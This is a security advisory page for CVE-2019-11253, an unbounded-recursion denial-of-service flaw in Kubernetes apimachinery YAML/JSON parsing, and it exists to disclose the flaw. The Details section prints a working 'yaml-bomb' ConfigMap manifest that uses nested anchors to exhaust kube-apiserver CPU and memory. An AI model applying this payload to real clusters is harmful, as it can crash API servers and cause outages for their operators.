GHSA-74fp-r6jw-h4mp
Suggest an improvement- Source
- https://github.com/advisories/GHSA-74fp-r6jw-h4mp
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-74fp-r6jw-h4mp/GHSA-74fp-r6jw-h4mp.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-74fp-r6jw-h4mp
- Aliases
- Related
- Published
- 2023-02-08T00:35:27Z
- Modified
- 2024-05-20T21:45:20Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
- Summary
- Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing
- Details
-
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable.
When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.
Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.
apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: defaultSpecific Go Packages Affected
- k8s.io/apimachinery/pkg/runtime/serializer/json
- k8s.io/apimachinery/pkg/util/json
- Database specific
{ "nvd_published_at": null, "cwe_ids": [ "CWE-20", "CWE-776" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-02-08T00:35:27Z" }- References
-
- https://nvd.nist.gov/vuln/detail/CVE-2019-11253
- https://github.com/kubernetes/kubernetes/issues/83253
- https://github.com/kubernetes/kubernetes/pull/83261
- https://github.com/advisories/GHSA-pmqp-h87c-mr78
- https://github.com/kubernetes/kubernetes
- https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs
- https://pkg.go.dev/vuln/GO-2022-0965
- https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap
Affected packages
Go / k8s.io/apimachinery
Package
- Name
- k8s.io/apimachinery
- View open source insights on deps.dev
- Purl
- pkg:golang/k8s.io/apimachinery